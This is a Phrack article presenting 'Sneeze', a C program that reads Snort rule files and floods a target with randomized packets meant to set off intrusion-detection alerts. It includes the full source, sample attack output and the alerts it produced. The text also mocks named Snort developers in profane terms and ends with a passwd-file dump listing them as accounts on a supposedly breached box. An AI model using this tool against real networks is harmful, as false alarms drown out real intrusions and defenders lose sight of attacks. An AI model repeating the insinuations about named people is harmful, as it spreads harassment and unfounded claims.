==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x0d of 0x0f |=----------------=[ Sneeze: Wreaking Havoc Upon Snort ]=---------------=| |=----------------------------------------------------------------------=| |=--------------=[ daemon10 ]=--------------=| 1. Introduction 2. Snort Rules 2.a Example snort Rule 2.b Rule Syntax and Analysis 3. The Code 3.a Programming considerations 3.b The Holy Grail Itself 4. Outro 4.a Self-Promotion Bibliography --[ 1. Introduction to Sneeze "I was gonna rip his heart out. I'm the best ever. I'm the most brutal and vicious, the most ruthless champion there has ever been. No one can stop me. Lennox is a conqueror? No! He's no Alexander! I'm Alexander! I'm the best ever. I'm Sonny Liston. I'm Jack Dempsey. There's never been anyone like me. I'm from their cloth. There is no one who can match me. My style is impetuous, my defense is impregnable, and I'm just ferocious. I want his heart! I want to eat his children! Praise be to Allah!" - Mike Tyson OK, now that I've come up with a wonderfully clever name for my program, and some great quotes by my favorite heavyweight boxer, it's time to get down to the code. What is snort? What is sneeze? snort ( P ) Pronunciation Key (snôrt) n. A rough, noisy sound made by breathing forcefully through the nostrils, as a horse or pig does. sneeze ( P ) Pronunciation Key (snz) intr. v. To expel air forcibly from the mouth and nose in an explosive, spasmodic involuntary action resulting chiefly from irritation of the nasal mucous membrane. From [1], "Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. Snort uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that utilizes a modular plugin architecture. Snort has a real-time alerting capability as well, incorporating alerting mechanisms for syslog, a user specified file, a UNIX socket, or WinPopup messages to Windows clients using Samba's smbclient. Snort has three primary uses. It can be used as a straight packet sniffer like tcpdump(1), a packet logger (useful for network traffic debugging, etc), or as a full blown network intrusion detection system. " So what is sneeze? As you can guess, it is the exact inversion and opposite of the popular network IDS tool, snort. Snort wants packets. Sneeze's job is to send millions and millions of them. Since snort is a piece of shit with tons of exploitable and DOS'able overflows (which unfortunately we aren't going to publish simply because they can be fixed too easily), one might expect that it would also suck at detecting false positives and floods and the like. Which, it does! Snort purports to be an excellent way for people who aren't sure how to disable default services and generally secure their server to detect intrusion attempts. It is also an official tool of our favorite friends over at Project Honeynet [2]. In the direct words of the devil himself, "Snort-Inline: Currently the Honeynet Project's control capabilities are based on IPTables and Snort-Inline. We are looking for people to port snort-inline to other firewalls and operating systems, including pf on OpenBSD." --[ 2. Snort Rules "I can sell out Madison Square Garden masturbating." - Mike Tyson Snort is a piece of shit, and a pretty basic piece of shit at that. I'm not sure exactly who Marty Roesche is, but judging by the sheer volume of off-by-one's, integer overflows, and logic bugs I found in his code, he was probably subject at one point to an intense training session by the Shmoo Group. 2.a Example snort Rule To generate the sneeze output, we will be using the Snort rule files. Let's take a look at an example rule file, taken from the snort.org website [3]: SID 209 message BACKDOOR w00w00 attempt Signature alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23 (msg:"BACKDOOR w00w00 attempt"; flow:to_server,established; content:"w00w00"; reference:arachnids,510; classtype:attempted-admin; sid:209; rev:4;) Summary w00w00 is a Trojan Horse utilizing Telnet. This event is generated when an attacker attempts to connect to a w00w00 server using Telnet. Impact Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine. As one can see, this is an extremely serious and threatening vulnerability, which lurks to destroy even the most paranoid of admins. Most snort rules come attached to a plethora of useless verbose information that we can just ignore. This makes it simple for a network administrator to see in his log directory the exact time and reason why he was owned, instead of simply giving a CERT# or exploit name that he would have to manually reference using a web search engine. In any case, the rule doesn't say much. Of course, the basic breakdown is that it the data must occur over an open (established) tcp session. The traffic must be sent to one of the telnet servers. TELNET_SERVERS is a snort preprocessor definition which is defined in snort.conf, and is typically defined to be $HOME_NET. For an unconfigured snort setup, HOME_NET will match "any" IP, but it can also be set to a subnet range such as 10.0.0.* or 192.168.0.* or whatever you want it to be. The data must be flowing "to_server." I'm sure you can figure this out... the data packet must also contain the string "w00w00." This rule is so simple we could just telnet to the server and type "w00w00" and trigger the snort rule if it's set. Notice how dumb this is: jobe can't even read his mail without 1. Setting off a snort alarm by typing in his password "w00w00" 2. Getting sniffed and owned because he's logging into df.ru via telnet There's not much to this. Let's look at one last example before we get into the code. This example is more complex: RPC mountd UDP export request alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC mountd UDP export request"; content:"|00 00 00 00|"; offset:4; depth:4; content:"|00 01 86 A5|"; offset:12; depth:4; content:"|00 00 00 05|"; distance:4; within:4; reference:arachnids,26; classtype:attempted-recon; sid:1924; rev:4;) We have multiple fields to keep our eye on. Here the packet contents are offset by '|' so we know that the result will be packed as a hex string. Hex strings can be 1, 2, or 4 bytes, depending on whether or not there are 2, 4, or 8 adjacent hex string bytes. For example, 03 is one hex byte, 00003 is a short hex word, etc. The offset field denotes what offset from the start of the packet the specified (byte) string will be found at. After an initial match, the "within" keyword specifies a minimum number of bytes from the last match that the current match should be found within. 2.b Rule Syntax and Analysis Here is a list of snort keywords with which we will be concerned: Keyword Description ------- ----------- dsize Specifies a necessary payload data size Can be used with <> operators to specify ranges content Matches a content string Can be combined with ! operator for inversions offset Specifies a content offset from the payload start depth Specifies maximum number of bytes to search through in order to make a content-based match nocase Toggle off case-sensitive matching flow Flow of traffic Can be to_server, from_server, etc. distance Specifies minimum byte distance between content matches There are things we won't be concerned with. These include: Preprocessors such as HTTP decode, Keyword directs such as Icmp_id Notice that the snort guides has reams of wonderful, efficient rules to secure your personal network from pesky intruders: alert tcp any any -> 192.168.1.0/24 80 (content: "cgi-bin/phf"; \ offset: 3; depth: 22; msg: "CGI-PHF access";) Of course, nobody would ever consider sending something like "GET /cgi-bin/blah..." to an HTTP server, so your depth match will be sure to catch ALL intrusion attempts. Since the snort rules give vague notions of how data should be arranged in a malicious packet (apart from the fixed fields specified by the "content" directive), we can easily create a polymorphic engine which can repeatedly send all sorts of fake snort triggers, with randomized data content and data lengths. And that's exactly what we did. --[ 3. The Code "This country was built on rape, slavery, murder, degradation and affiliation with crime." - Mike Tyson 3.a. Programming Considerations The following program could have been made more complete and thorough by employing packet construction techniques that matched all possible snort rule directives. The code below only works on exploits that utilize plain vanilla TCP connections and UDP attacks. And believe me, there are plenty of such attacks to go around for everybody. Some rules require special IP or TCP options to be set, or IP fragmentation, etc. Even though I am the renowned author of the famous libnet library, and the world's foremost authority on IP spoofing, TCP hijacking, and packet construction, I was not able to include these features into sneeze 1.0 because of the time such features would require. I have a fast car, a girlfriend, and a complex web of social acquaintances, so... dear reader, as you may have guessed, I have better things to do than develop free software that meets all your demands and specifications. Besides, using standard sockets to do all the work is good because it allows the program to be run by any user. Here's some sample output... First the scan: Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Interesting ports on juggernaut (192.168.0.6): (The 1593 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 37/tcp open time 79/tcp open finger 111/tcp open sunrpc 113/tcp open auth 587/tcp open submission Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds infonexus# Now, running sneeze with debugging output... infonexus# ./sneeze juggernaut 21,22,25,37,79,111,113,587 /usr/pkg/share/snort/*.rules [..... snip .....] launching attack ... ATTACK [SMTP expn *@] srcport - 0, dstport - 25, proto - tcp, dsize - 0 offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 7, [expn *@] ATTACK LEN = 7 : [eXpN *@] ATTACK [SMTP sendmail 5.5.5 exploit] srcport - 0, dstport - 25, proto - tcp, dsize - 0 offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 13, [mail from: "|] ATTACK LEN = 13 : [mAiL fRoM: "|] ATTACK [RPC portmap request ypserv] srcport - 0, dstport - 111, proto - udp, dsize - 0 offset = 40, distance = 0, within = 0, case-sensitive = 0, len = 5, [\x01\x86\xa4\x00\x00] ATTACK LEN = 45 : [4Yd29qVs0eHcxQBSEfTCJ1m3iRL8vwMPINoZhguW\x01¤\x00\x00] ^C infonexus# Here's the log we see in the other window with our trusty tail -f monitor: [**] [1:1450:2] SMTP expn *@ [**] [Classification: Misc Attack] [Priority: 2] 09/17-19:21:10.959696 192.168.0.1:64383 -> 192.168.0.6:25 TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59 ***AP*** Seq: 0x10DAD08F Ack: 0x80636DD1 Win: 0x4470 TcpLen: 32 TCP Options (3) => NOP NOP TS: 4423435 65878141 [Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200] [**] [1:1450:2] SMTP expn *@ [**] [Classification: Misc Attack] [Priority: 2] 09/17-19:21:10.959803 192.168.0.1:64383 -> 192.168.0.6:25 TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59 ***AP*** Seq: 0x10DAD08F Ack: 0x80636DD1 Win: 0x4470 TcpLen: 32 TCP Options (3) => NOP NOP TS: 4423435 65878141 [Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200] [**] [1:662:3] SMTP sendmail 5.5.5 exploit [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 09/17-19:21:12.965590 192.168.0.1:64382 -> 192.168.0.6:25 TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65 ***AP*** Seq: 0x15071B8E Ack: 0x805FB299 Win: 0x4470 TcpLen: 32 TCP Options (3) => NOP NOP TS: 4423439 65878342 [Xref => http://www.whitehats.com/info/IDS119] [**] [1:662:3] SMTP sendmail 5.5.5 exploit [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 09/17-19:21:12.965701 192.168.0.1:64382 -> 192.168.0.6:25 TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65 ***AP*** Seq: 0x15071B8E Ack: 0x805FB299 Win: 0x4470 TcpLen: 32 TCP Options (3) => NOP NOP TS: 4423439 65878342 [Xref => http://www.whitehats.com/info/IDS119] [**] [1:590:2] RPC portmap request ypserv [**] [Classification: Decode of an RPC Query] [Priority: 2] 09/17-19:21:14.975717 192.168.0.1:63432 -> 192.168.0.6:111 UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73 Len: 53 [Xref => http://www.whitehats.com/info/IDS12] [**] [1:590:2] RPC portmap request ypserv [**] [Classification: Decode of an RPC Query] [Priority: 2] 09/17-19:21:14.975818 192.168.0.1:63432 -> 192.168.0.6:111 UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73 Len: 53 [Xref => http://www.whitehats.com/info/IDS12] 3.b. The Holy Grail Itself Grab yourself some snort rule files to pipe into this, and then Start cutting ....... #include #include #include #include #include #include #include #include #include #include #include #include #include #define XDEBUG 1 /* we can't hope to generate these sorts of packets, so just skip them automatically */ char *ignored_keywords[] = { "id", "ipoption", "fragbits", "seq", "ack", "itype", "icode", "session", "icmp_id", "icmp_seq", "content-list", "uricontent", "ip_proto", "fragoffset", "tos", "ttl", "byte_test", "byte_jump" }; /* FUCK SNORT */ #define DELAY_TIME 2 /* # seconds between attacks */ #define XMAX(x,y) (x > y ? x : y) struct snort_data { unsigned int attack_len; unsigned char *attack_data; unsigned char case_insensitive; unsigned int offset; unsigned int distance; unsigned int within; struct snort_data *next; }; /* everything should run in user mode... so not ALL attacks will be used */ struct snort_rule { char *description; unsigned short srcport; unsigned short dstport; unsigned char protocol; unsigned int dsize; struct snort_data *sdata; struct snort_rule *next; }; struct snort_rule *ruleslist = NULL; unsigned int num_rules = 0; struct snort_rule *select_random_rule (int *availports); int *read_port_list (char *ports); void add_rule (char *buf); int parse_line_data (struct snort_rule *rule, char *line); void debug_printf (char *fmt, ...); unsigned short getsrcport (char *portstr, char *proto); void *parse_content_string (char *line, unsigned int *sizeptr); void dump_snort_data (struct snort_data *data); void mix_case (char *ptr, unsigned int len); void *create_data_packet (struct snort_rule *rule, unsigned int *sizeptr); void fill_random_data (char *buf, unsigned int len); int random_number (int lo, int hi); void *xrealloc (void *ptr, size_t size); void usage (char *program) { fprintf (stderr, "Usage: %s [rulefile1 rulefile2 ...]\n", program); exit (EXIT_FAILURE); } int main (int argc, char *argv[]) { FILE *f; struct snort_rule *cur; struct sockaddr_in s_in, bs_in; struct hostent *he; char *hostname; char *portlist; unsigned int i; int *ports, fd; srand (time (NULL)); if (argc < 4) usage (argv[0]); hostname = argv[1]; portlist = argv[2]; if ((ports = read_port_list (portlist)) == NULL) { fprintf (stderr, "Error reading portlist!\n"); exit (EXIT_FAILURE); } if ((he = gethostbyname (hostname)) == NULL) { herror ("gethostbyname"); exit (EXIT_FAILURE); } memset (&s_in, 0, sizeof (s_in)); s_in.sin_family = AF_INET; memcpy (&s_in.sin_addr.s_addr, he->h_addr, 4); for (i = 3; i < argc; i++) { char rulebuf[1024]; f = fopen (argv[i], "r"); if (f == NULL) { perror (argv[i]); exit (EXIT_FAILURE); } memset (rulebuf, 0, sizeof (rulebuf)); while (fgets (rulebuf, sizeof (rulebuf) - 1, f) != NULL) { add_rule (rulebuf); memset (rulebuf, 0, sizeof (rulebuf)); } fclose (f); } /* wreak havoc */ printf ("launching attack ...\n"); while (1) { char *attack_data = NULL; unsigned int attack_len; cur = select_random_rule (ports); if (cur == NULL) { fprintf (stderr, "Unexpected error encountered!\n"); exit (EXIT_FAILURE); } debug_printf ("ATTACK [%s]\n srcport - %u, dstport - %u, " "proto - %s, dsize - %d\n", cur->description, cur->srcport, cur->dstport, (cur->protocol == IPPROTO_TCP ? "tcp" : "udp"), cur->dsize); dump_snort_data (cur->sdata); s_in.sin_port = htons (cur->dstport); /* choose a valid open port */ if (!s_in.sin_port) s_in.sin_port = htons (*portlist); if (cur->protocol == IPPROTO_TCP) fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); else fd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (fd < 0) { perror ("socket"); exit (EXIT_FAILURE); } /* in case we need to bind to a particular port */ if (cur->srcport) { int on = 1; memset (&bs_in, 0, sizeof (bs_in)); bs_in.sin_family = AF_INET; bs_in.sin_addr.s_addr = INADDR_ANY; bs_in.sin_port = htons (cur->srcport); setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)); if (bind (fd, (struct sockaddr *) &bs_in, sizeof (bs_in)) < 0) { perror ("bind"); close (fd); continue; } } attack_data = create_data_packet (cur, &attack_len); { unsigned int z; debug_printf ("ATTACK LEN = %d : [", attack_len); for (z = 0; z < attack_len; z++) { if (isprint (attack_data[z])) debug_printf ("%c", attack_data[z]); else debug_printf ("\\x%.2x", attack_data[z]); } debug_printf ("]\n"); } if (attack_data == NULL) { fprintf (stderr, "Unexpected error occurred!\n"); exit (EXIT_FAILURE); } if (cur->protocol == IPPROTO_TCP) { if (connect (fd, (struct sockaddr *) &s_in, sizeof (s_in)) < 0) { perror ("connect"); close (fd); continue; } send (fd, attack_data, attack_len, 0); } else sendto (fd, attack_data, attack_len, 0, (struct sockaddr *) &s_in, sizeof (s_in)); close (fd); free (attack_data); printf ("\n."); sleep (DELAY_TIME); } return 0; } #define ABORT_RULE { free (rule); return; } void add_rule (char *buf) { struct snort_rule *rule; char word1[64], word2[64], word3[64], word4[64], word5[64], word6[64], word7[64]; char *ptr = buf; if (buf[0] == '#') return; buf[strlen (buf) - 1] = 0; if ((rule = malloc (sizeof (struct snort_rule))) == NULL) { perror ("malloc"); exit (EXIT_FAILURE); } memset (rule, 0, sizeof (struct snort_rule)); rule->next = NULL; if (sscanf (buf, "%s %s %s %s %s %s %s", word1, word2, word3, word4, word5, word6, word7) != 7) ABORT_RULE if (strcasecmp (word1, "alert")) ABORT_RULE if (!strcasecmp (word2, "tcp")) rule->protocol = IPPROTO_TCP; else if (!strcasecmp (word2, "udp")) rule->protocol = IPPROTO_UDP; else ABORT_RULE if ((strcmp (word3, "$EXTERNAL_NET")) && (strcmp (word3, "any")) && (strcmp (word3, "$HOME_NET")) && (strcmp (word3, "$HTTP_SERVERS"))&& (strcmp (word3, "$SMTP_SERVERS")) && (strcmp (word3, "SQL_SERVERS")) && (strcmp (word3, "$TELNET_SERVERS"))) ABORT_RULE /* handle multiple source ports by replicating a rule for each port */ if (strchr (word4, ':')) { char *dupbuf, *dptr, *dptr2; size_t cdiff; if ((dupbuf = strdup (buf)) == NULL) ABORT_RULE if ((dptr = strstr (dupbuf, word4)) == NULL) { free (dupbuf); ABORT_RULE } if ((dptr2 = strchr (dptr, ':')) == NULL) { free (dupbuf); ABORT_RULE } dptr2++; cdiff = (size_t) dptr2 - (size_t) dptr; memcpy (dptr, dptr2, strlen (dptr2)); memset ((dptr + strlen (dptr) - cdiff), 0, cdiff); add_rule (dupbuf); free (dupbuf); } if (!strcmp (word4, "any")) rule->srcport = 0; else { rule->srcport = getsrcport (word4, word2); if (!rule->srcport) ABORT_RULE } /* must go to the server or be bi-directional flow */ if ((strcmp (word5, "->")) && strcmp (word5, "<>")) ABORT_RULE /* handle multiple destination ports */ if (strchr (word7, ':')) { char *dupbuf, *dptr, *dptr2; size_t cdiff; if ((dupbuf = strdup (buf)) == NULL) ABORT_RULE if ((dptr = strstr (dupbuf, word4)) == NULL) { free (dupbuf); ABORT_RULE } if ((dptr2 = strchr (dptr, ':')) == NULL) { free (dupbuf); ABORT_RULE } dptr2++; cdiff = (size_t) dptr2 - (size_t) dptr; memcpy (dptr, dptr2, strlen (dptr2)); memset ((dptr + strlen (dptr) - cdiff), 0, cdiff); add_rule (dupbuf); free (dupbuf); } if (!strcmp (word7, "$HTTP_PORTS")) rule->dstport = 80; else if (!strcmp (word7, "$ORACLE_PORTS")) rule->dstport = 1521; else if (!strcmp (word7, "$SHELLCODE_PORTS")) rule->dstport = 0; else if (!strcmp (word7, "any")) rule->dstport = 0; else { rule->dstport = getsrcport (word7, word2); if (!rule->dstport) ABORT_RULE } ptr = buf; rule->sdata = NULL; ptr = strchr (buf, '('); if (ptr == NULL) ABORT_RULE if (!parse_line_data (rule, ptr)) { /* success, prepend the rule to the list */ if (ruleslist == NULL) ruleslist = rule; else { rule->next = ruleslist; ruleslist = rule; } num_rules++; debug_printf ("ADDED RULE - [%s], srcport = %d, dstport = %d, proto = %d\n", rule->description, rule->srcport, rule->dstport, rule->protocol); dump_snort_data (rule->sdata); } return; } #define REJECT_RULE { rejected = 1; goto done_parsing; } /* parse the main data into the full snort rule */ /* return 1 if the operation fails, 0 otherwise */ int parse_line_data (struct snort_rule *rule, char *line) { struct snort_data *sdata = NULL, *last_data = NULL; char *ptr, *end_keyword, *begin_data, *end_data; unsigned int i; unsigned int rejected = 0; ptr = line; *ptr++ = 0; while (1) { while (isspace (*ptr)) ptr++; if (!*ptr) REJECT_RULE else if (*ptr == ')') goto done_parsing; end_keyword = ptr; /* rembmer keywords such as nocase take no parameters */ while (*end_keyword && (*end_keyword != ':') && (*end_keyword != ';')) end_keyword++; if (!*end_keyword) REJECT_RULE *end_keyword++ = 0; if (!strlen (ptr)) REJECT_RULE /* check to see if we can handle this keyword */ for (i = 0; i < (sizeof (ignored_keywords) / sizeof (char *)); i++) { if (!strcasecmp (ptr, ignored_keywords[i])) REJECT_RULE } /* special case */ if (!strcasecmp (ptr, "nocase")) { if (sdata == NULL) REJECT_RULE sdata->case_insensitive = 1; ptr = end_keyword; continue; } begin_data = end_keyword; while (isspace (*begin_data)) begin_data++; if (*begin_data == '"') begin_data++; end_data = begin_data; if (*(begin_data - 1) == '"') { /* take account for escaped string sequences */ while (*end_data && (*end_data != '"') && (*(end_data - 1) != '\\')) end_data++; if (!*end_data) REJECT_RULE } if (*end_data == '"') *end_data++ = 0; end_data = strchr (end_data, ';'); if (end_data == NULL) REJECT_RULE *end_data++ = 0; /* handle known keywords */ /* we can only handle a small subset of datasize keywords... don't worry about ranges, only worry about the '>' operator, which will usually only be used to detect overflow attempts */ if (!strcasecmp (ptr, "dsize")) { unsigned int gt = 0; while (isspace (*begin_data)) begin_data++; /* make sure its an exact number or gt */ if (!isdigit (*begin_data) && (*begin_data != '>')) REJECT_RULE /* Exceed '>' directive by x bytes */ #define GT_INC 16 if (*begin_data == '>') { gt = 1; begin_data++; } rule->dsize = atoi (begin_data); if (!rule->dsize) REJECT_RULE if (gt) rule->dsize += GT_INC; } /* msg holds the rule description */ else if (!strcasecmp (ptr, "msg")) { rule->description = strdup (begin_data); if (rule->description == NULL) REJECT_RULE } else if (!strcasecmp (ptr, "content")) { /* we can't handle inverted content matches */ if (*begin_data == '!') REJECT_RULE sdata = malloc (sizeof (struct snort_data)); if (sdata == NULL) REJECT_RULE memset (sdata, 0, sizeof (struct snort_data)); if (last_data == NULL) { rule->sdata = sdata; last_data = sdata; } else { last_data->next = sdata; last_data = sdata; } sdata->attack_data = parse_content_string (begin_data, &(sdata->attack_len)); if (sdata->attack_data == NULL) REJECT_RULE } /* * only handle a very special case of flags.... * basically anything that doesnt have to do with the ACK flag * will be filtered out, because we can't handle raw scans... * I don't know why flags:A+ is sometimes specified but it is... */ else if (!strcasecmp (ptr, "flags")) { char *fptr; fptr = begin_data; while (isspace (*fptr)) fptr++; if (strncmp (fptr, "A+", 2)) REJECT_RULE } else if (!strcasecmp (ptr, "offset")) { if (sdata == NULL) REJECT_RULE sdata->offset = atoi (begin_data); } else if (!strcasecmp (ptr, "distance")) { if (sdata == NULL) REJECT_RULE sdata->distance = atoi (begin_data); } else if (!strcasecmp (ptr, "within")) { if (sdata == NULL) REJECT_RULE sdata->within = atoi (begin_data); } ptr = end_data; } done_parsing: if (rejected) { struct snort_data *dptr = rule->sdata; /* destroy the rule information */ while (dptr != NULL) { struct snort_data *cur; cur = dptr; dptr = dptr->next; if (cur->attack_data != NULL) free (cur->attack_data); free (cur); } free (rule); return 1; } return 0; } /* comma-delimited list of portnames from command line input */ int * read_port_list (char *ports) { char *ptr = ports; int *portlist = NULL, num; unsigned int nitems = 0; while (ptr != NULL && *ptr) { ptr = strchr (ports, ','); if (ptr != NULL) *ptr++ = 0; num = atoi (ports); if (!num) return NULL; ports = ptr; nitems++; portlist = xrealloc (portlist, (sizeof (int *) * (nitems + 1))); portlist[nitems - 1] = num; portlist[nitems] = 0; } return portlist; } /* target a random attack, picked out of availports */ struct snort_rule * select_random_rule (int *availports) { struct snort_rule *r; unsigned short num; unsigned int i = 0; int *pptr; num = random_number (0, num_rules - 1); r = ruleslist; while (i < num) { r = r->next; if (r == NULL) r = ruleslist; for (pptr = availports; *pptr; pptr++) { if (r->dstport == *pptr) { i++; } } } return r; } /* verbose logging */ void debug_printf (char *fmt, ...) { #ifdef XDEBUG va_list ap; char outbuf[1024]; memset (outbuf, 0, sizeof (outbuf)); va_start (ap, fmt); vsnprintf (outbuf, sizeof (outbuf) - 1, fmt, ap); fprintf (stderr, "%s", outbuf); va_end (ap); #endif return; } /* convert a string to a port number */ unsigned short getsrcport (char *portstr, char *proto) { struct servent *se; unsigned short result; if (portstr == NULL) return 0; result = atoi (portstr); if (result) return result; if ((se = getservbyname (portstr, proto)) == NULL) return 0; result = ntohs (se->s_port); return result; } #define ABORT_PARSE { free (databuf); return NULL; } /* parse content line... return the buffer and store its length in sizeptr */ void * parse_content_string (char *line, unsigned int *sizeptr) { char *ptr, *databuf = NULL; char *ptr2, *ptr3; *sizeptr = 0; ptr = ptr2 = line; while (*ptr) { /* regular character or escaped pipe */ if ((*ptr != '|') || ((*ptr == '|') && (*(ptr - 1) == '\\'))) { (*sizeptr)++; databuf = xrealloc (databuf, *sizeptr); databuf[*sizeptr - 1] = *ptr; ptr++; } else { unsigned char numbuf[16]; unsigned char byte; unsigned short word; unsigned long dword, dlen; /* deal with raw data in hex format */ ptr++; while (*ptr) { unsigned char saved_char; while (isspace (*ptr)) ptr++; /* reached end of raw hex */ if (*ptr == '|') { ptr++; goto outer_loop; } for (ptr3 = ptr; (*ptr3 && (*ptr3 != '|') && (!isspace (*ptr3))); ptr3++) ; saved_char = *ptr3; if (!saved_char) ABORT_PARSE *ptr3++ = 0; memset (numbuf, 0, sizeof (numbuf)); strncpy (numbuf, ptr, sizeof (numbuf) - 1); ptr = ptr3; /* determine whether we are reading a * hex byte, word, or double word */ if (strlen (numbuf) <= 2) { dlen = 1; byte = strtoul (numbuf, NULL, 16); } else if (strlen (numbuf) <= 4) { dlen = 2; word = htons ((unsigned short) strtoul (numbuf, NULL, 16)); } else if (strlen (numbuf) <= 8) { dlen = 4; dword = htonl (strtoul (numbuf, NULL, 16)); } else /* can't handle this yet */ ABORT_PARSE *sizeptr += dlen; databuf = xrealloc (databuf, *sizeptr); if (dlen == 1) databuf[*sizeptr - 1] = byte; else if (dlen == 2) memcpy (&databuf[*sizeptr - 2], &word, 2); else if (dlen == 4) memcpy (&databuf[*sizeptr - 4], &dword, 4); if (saved_char == '|') goto outer_loop; } outer_loop: } } ptr = ptr2; if (!*sizeptr) ABORT_PARSE return databuf; } void dump_snort_data (struct snort_data *data) { #ifdef XDEBUG struct snort_data *ptr; for (ptr = data; ptr != NULL; ptr = ptr->next) { unsigned int i; fprintf (stderr, " offset = %d, distance = %d, within = %d, " "case-sensitive = %d, len = %d, [", ptr->offset, ptr->distance, ptr->within, ptr->case_insensitive, ptr->attack_len); for (i = 0; i < ptr->attack_len; i++) { if (isprint (ptr->attack_data[i])) fprintf (stderr, "%c", ptr->attack_data[i]); else fprintf (stderr, "\\x%.2x", (unsigned char) ptr->attack_data[i]); } fprintf (stderr, "]\n"); } #endif return; } /* Mix the case of a case-insensitive string */ void mix_case (char *ptr, unsigned int len) { unsigned int i; for (i = 0; i < len; i++) { if (!isalpha (ptr[i])) continue; if ((rand ()) % 2) ptr[i] = tolower (ptr[i]); else ptr[i] = toupper (ptr[i]); } return; } /* using a snort rule framework, create a packet using polymorphism */ void * create_data_packet (struct snort_rule *rule, unsigned int *sizeptr) { struct snort_data *sptr; char *buf = NULL, *ptr; unsigned int buflen = 0; for (sptr = rule->sdata; sptr != NULL; sptr = sptr->next) { unsigned int inclen, oldlen, pos; pos = oldlen = buflen; buflen = XMAX(buflen, sptr->offset); buf = xrealloc (buf, buflen); ptr = buf; ptr += oldlen; fill_random_data (ptr, (buflen - oldlen)); if (sptr->offset) { ptr = buf + sptr->offset; pos = sptr->offset; } else { unsigned int d, w, padbytes; d = sptr->distance; w = sptr->within; if (d && !w) w = d; /* this should never happen */ if (d > w) d = w; oldlen = buflen; padbytes = random_number (d, w); inclen = buflen + padbytes; buf = xrealloc (buf, inclen); ptr = buf + oldlen; fill_random_data (ptr, padbytes); ptr += padbytes; pos += padbytes; } /* finally, fill in our data */ buflen += sptr->attack_len; buf = xrealloc (buf, buflen); ptr = buf + pos; memcpy (ptr, sptr->attack_data, sptr->attack_len); if (sptr->case_insensitive) mix_case (ptr, sptr->attack_len); } /* finally, extend the buffer if dsize is specified */ if (rule->dsize && (buflen != rule->dsize)) { unsigned int oldblen = buflen; buflen = rule->dsize; buf = xrealloc (buf, buflen); ptr = buf; ptr += oldblen; fill_random_data (ptr, (buflen - oldblen)); } *sizeptr = buflen; return buf; } /* fill buf with random data */ void fill_random_data (char *buf, unsigned int len) { unsigned int i; for (i = 0; i < len; i++) { /* let's not make it completely random */ unsigned char randbyte = 0; while (!(isalnum (randbyte))) randbyte = (rand() & 0xff); buf[i] = (char) randbyte; } return; } /* generate random number between lo and hi */ int random_number (int lo, int hi) { int result; result = rand (); result %= ((hi - lo) + 1); result += lo; return result; } /* some implementations don't allow reallocs with 0 */ void * xrealloc (void *ptr, size_t size) { void *result; if (!size) size = 4; result = realloc (ptr, size); if (result == NULL) { perror ("realloc"); exit (EXIT_FAILURE); } return result; } --[ 4. Outro "I haven't been with a woman in nine months." - Mike Tyson Fuck Snort. Oh, and these techniques should of course be applicable to a variety of other IDS's, all of which probably have rule lists imported from snort. 4.1 Self-Promotion You can expect a user's manual for my sneeze tool to appear as its own seperate article sometime in the near future. In addition, I would like to notify you of my new and upcoming book, Hacker's Challenge Part III. Like the past two books in this series, I discuss real life forensic and hacking investigation conundrums and the solutions. These puzzles will get your axons firing and stimulate your frontal cortex more than any other security book you've ever seen. "What does this have to do with this article?" - you may inquisitively ask. Well, you may recall from above some of the poorly written snort rules. Attached is a small excerpt from Hacker's Challenge III. Match your wits against the attackers as you try to figure out how they "owned" this box. Would this break-in incident have occurred if the administrators would have written more rigorous snort rules? cd /home; cat /etc/passwd; root:*:0:0:Charlie &:/root:/usr/local/bin/tcsh daemon:*:1:1:The devil himself:/root:/sbin/nologin operator:*:2:5:System &:/operator:/sbin/nologin bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico www:*:67:67:HTTP server:/var/www:/sbin/nologin named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin roesch:*:1000:1000:Martin Roesch:/home/roesch:/usr/local/bin/tcsh jpavlick:*:1001:1001:John Pavlick:/home/jpavlick:/usr/local/bin/tcsh dr:*:1002:1002:Dragos Ruiu:/home/dr:/usr/local/bin/tcsh mikef:*:1003:1003:Mike Forostiak:/home/mikef:/usr/local/bin/tcsh tburgess:*:1004:1004:Tom Burgess:/home/tburgess:/usr/local/bin/tcsh bmc:*:1005:1005:Brian Caswell:/home/bmc:/usr/local/bin/tcsh phil:*:1006:1006:Phil Cataldi:/home/phil:/usr/local/bin/tcsh jed:*:1007:1007:Jed Haile:/home/jed:/usr/local/bin/tcsh andrewb:*:1008:1008:Andrew Baker:/home/andrewb:/usr/local/bin/tcsh sfuser1:*:1009:1009:remote 